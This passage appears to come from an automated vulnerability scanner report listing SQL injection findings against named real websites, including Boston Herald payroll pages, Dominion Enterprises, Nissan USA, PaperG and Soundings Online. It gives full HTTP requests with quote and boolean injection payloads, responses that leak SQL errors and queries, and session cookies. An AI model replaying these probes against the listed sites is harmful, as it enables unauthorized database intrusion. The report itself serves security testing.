Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:39:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 492
Content-Type: text/html; charset=UTF-8
Connection: close

SQL:
SELECT a.*, b.agency FROM `quasi_state_data` a INNER JOIN `quasi_state_agencies` b ON a.quasi_state_agency_id = b.id WHERE 1=1 ORDER BY ?1\'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1\'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

1.35. http://www.bostonherald.com/projects/payroll/quincy/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.bostonherald.com
Path:	/projects/payroll/quincy/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/quincy/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:36:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 317
Content-Type: text/html; charset=UTF-8
Connection: close

SQL:
SELECT a.* FROM `quincyData` a WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

1.36. http://www.bostonherald.com/projects/payroll/suffolk/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.bostonherald.com
Path:	/projects/payroll/suffolk/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/suffolk/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 319
Content-Type: text/html; charset=UTF-8
Connection: close

SQL:
SELECT a.* FROM `suffolkData` a WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

1.37. http://www.bostonherald.com/projects/payroll/worcester/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.bostonherald.com
Path:	/projects/payroll/worcester/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/worcester/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:42:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 323
Content-Type: text/html; charset=UTF-8
Connection: close

SQL:
SELECT a.* FROM `worcesterData` a WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

1.38. http://www.dominionenterprises.com/main/do/Terms_of_Use [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.dominionenterprises.com
Path:	/main/do/Terms_of_Use

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /main/do'%20and%201%3d1--%20/Terms_of_Use HTTP/1.1
Host: www.dominionenterprises.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 18:06:02 GMT
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=be366704e38672859a8db520782f792d; expires=Sun, 30 Jan 2011 18:06:02 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 18:06:02 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Connection: close
Content-Type: text/html
Set-Cookie: TSa27990=ca07e63a6f9fbb179ce5ad4d3c3e1878d10fbf26f7d312e64d42fc7d9c5eca85e9f8e0cb; Path=/
Content-Length: 32742

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Home</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Home">
   <meta name="keywords" content="Home">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">

<script language="javascript" type="text/javascript">
var IsIPad = false;
function QueryStringIsRequestFromMobile(DirectToFullSite) {
Queries = window.location.search.substring(1);
if (Queries == "" || Queries == null) {
return false;
}
else {
QueryArray = Queries.split("&");
for (i = 0; i < QueryArray.length; i++) {
QueryValue = QueryArray[i].split("=");
if (QueryValue[0] == DirectToFullSite) {
if (QueryValue[1] == "fs24lmj09")
return true;
else
return fa
...[SNIP]...

Request 2

GET /main/do'%20and%201%3d2--%20/Terms_of_Use HTTP/1.1
Host: www.dominionenterprises.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 18:06:02 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=db04ccde3cb4cfceafb82443534877bd; expires=Sun, 30 Jan 2011 18:06:02 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 18:06:02 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Connection: close
Content-Type: text/html
Content-Length: 32742

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Home</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Home">
   <meta name="keywords" content="Home">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">

<script language="javascript" type="text/javascript">
var IsIPad = false;
function QueryStringIsRequestFromMobile(DirectToFullSite) {
Queries = window.location.search.substring(1);
if (Queries == "" || Queries == null) {
return false;
}
else {
QueryArray = Queries.split("&");
for (i = 0; i < QueryArray.length; i++) {
QueryValue = QueryArray[i].split("=");
if (QueryValue[0] == DirectToFullSite) {
if (QueryValue[1] == "fs24lmj09")
return true;
else
return false;
}
else

...[SNIP]...

1.39. http://www.nissanusa.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.nissanusa.com
Path:	/

Issue detail

Remediation detail

Request 1

GET /?1%2527=1 HTTP/1.1
Host: www.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.11 (Unix) Communique/4.0.4 mod_ssl/2.2.11 OpenSSL/0.9.7d
Content-Type: text/html;charset=UTF-8
Date: Sat, 29 Jan 2011 04:37:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 66631

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>

<meta http-equiv="Content-type" content="text/html; charset=UTF-8" />
<t
...[SNIP]...
<span>See How They Stack Up</span>
...[SNIP]...

Request 2

GET /?1%2527%2527=1 HTTP/1.1
Host: www.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.11 (Unix) Communique/4.0.4 mod_ssl/2.2.11 OpenSSL/0.9.7d
Content-Type: text/html;charset=UTF-8
Date: Sat, 29 Jan 2011 04:37:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 66631

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>

<meta http-equiv="Content-type" content="text/html; charset=UTF-8" />
<t
...[SNIP]...

1.40. http://www.paperg.com/flyerboard/soundings-publications-llc/2123/0.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.paperg.com
Path:	/flyerboard/soundings-publications-llc/2123/0.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 70060861%20or%201%3d1--%20 and 70060861%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/soundings-publications-llc/212370060861%20or%201%3d1--%20/0.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;

Response 1

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:17:50 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3370
Connection: close
Via: 1.1 AN-0016020122637050

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Flyerboard - NY Daily News" />

   <meta name="description" content = "NY Daily News NY Daily News Flyerboard, a community bulletin board." />

   <link rel="image_src" href="http://www.paperg.com/beta/user/4/logo.gif" />

   
   

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }
   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   
   <div id="background_bar_container">
       <div id="background_bar"> </div>
   </div>
   


   <div id="body-wrap">
       
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
       </div>
       

        
    <div id="set1">
       NY Daily News Flyerboard     </div>
    

           
           <div id="content">



               <div style="text-align: center; margin: 10px;">



            <s
...[SNIP]...

Request 2

GET /flyerboard/soundings-publications-llc/212370060861%20or%201%3d2--%20/0.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;

Response 2

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:17:51 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050

1.41. https://www.paperg.com/post.php [bid parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.paperg.com
Path:	/post.php

Issue detail

The bid parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the bid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /post.php?bid=2123%20and%201%3d1--%20&pid=3922&post HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;

Response 1

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:17:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <title>PaperG | Post a Flyer</title>

       <meta http-equiv="Content-Type" co
...[SNIP]...
<script type="text/javascript" src="https://www.paperg.com/jsfb/embed.php?rand=84590&view=pre&height=200&width=200"></script>

                       </div>
                       <br /><br />



                       <div class="clear"></div>

                           <div align="center" >
                           <br />
<div id="lowest_cost_left_col">
                           <h3>INTRODUCTORY RATE
As low as $50/week

</h3>                             </div>
<div id="total_cost_left_col">
                               Total cost:
                               <h2>
<span id="estimated_cost_span" onmouseover="Tip('The cost automatically updates based on the publications you choose',WIDTH, 200)" onmouseout="UnTip();"> </span>
<span id="estimated_cost_month_label" style="display:none;"><br />per month</span>
</h2>
                               </div>

                            <div id="total_length_left_col">
                               Total length:
                               <h2><span id="time_span">0 days</span></h2>
</div>

                           </div>
                                                       <div id="multiboard_selected" align="center" style="display:none;">
                           *You will receive a discount for selecting multiple boards, which will be applied on the final confirmation screen.
                           </div>

                   </div>
               </div>

               
               
               <a id="cMiddle_top" name="cMiddle_top"> </a>
               <div id="cMiddle_loading" style="text-align:center;"><img src="post/waitanimation.gif" /> Loading...</div>
               <div id="cMiddle" class="post" style="display:none;">

                   Having trouble posting? <a href="support.php">Email us</a> or call (203)889-3358 and press 0.
                                           You can also try <a onclick="verify_reset();">starting over</a>.
                       <script type="text/javascript">
                       function verify_reset()
                       {
                           var answer = confirm("Are you sure you wish you start over? You will lose any information you have entered.");
                           if (answer)
                           {
                               wind
...[SNIP]...

Request 2

GET /post.php?bid=2123%20and%201%3d2--%20&pid=3922&post HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;

Response 2

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:17:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <title>PaperG | Post a Flyer</title>

       <meta http-equiv="Content-Type" co
...[SNIP]...
<script type="text/javascript" src="https://www.paperg.com/jsfb/embed.php?rand=56564&view=pre&height=200&width=200"></script>

                       </div>
                       <br /><br />



                       <div class="clear"></div>

                           <div align="center" >
                           <br />
<div id="lowest_cost_left_col">
                           <h3>INTRODUCTORY RATE
As low as $50/week

</h3>                             </div>
<div id="total_cost_left_col">
                               Total cost:
                               <h2>
<span id="estimated_cost_span" onmouseover="Tip('The cost automatically updates based on the publications you choose',WIDTH, 200)" onmouseout="UnTip();"> </span>
<span id="estimated_cost_month_label" style="display:none;"><br />per month</span>
</h2>
                               </div>

                            <div id="total_length_left_col">
                               Total length:
                               <h2><span id="time_span">0 days</span></h2>
</div>

                           </div>
                                                       <div id="multiboard_selected" align="center" style="display:none;">
                           *You will receive a discount for selecting multiple boards, which will be applied on the final confirmation screen.
                           </div>

                   </div>
               </div>

               
               
               <a id="cMiddle_top" name="cMiddle_top"> </a>
               <div id="cMiddle_loading" style="text-align:center;"><img src="post/waitanimation.gif" /> Loading...</div>
               <div id="cMiddle" class="post" style="display:none;">

                   Having trouble posting? <a href="support.php">Email us</a> or call (203)889-3358 and press 0.
                                           You can also try <a onclick="verify_reset();">starting over</a>.
                       <script type="text/javascript">
                       function verify_reset()
                       {
                           var answer = confirm("Are you sure you wish you start over? You will lose any information you have entered.");
                           if (answer)
                           {
                               wind
...[SNIP]...

1.42. http://www.soundingsonline.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.43. http://www.soundingsonline.com/about-us [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/about-us

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /about-us?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /about-us?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.44. http://www.soundingsonline.com/advertise [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/advertise

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

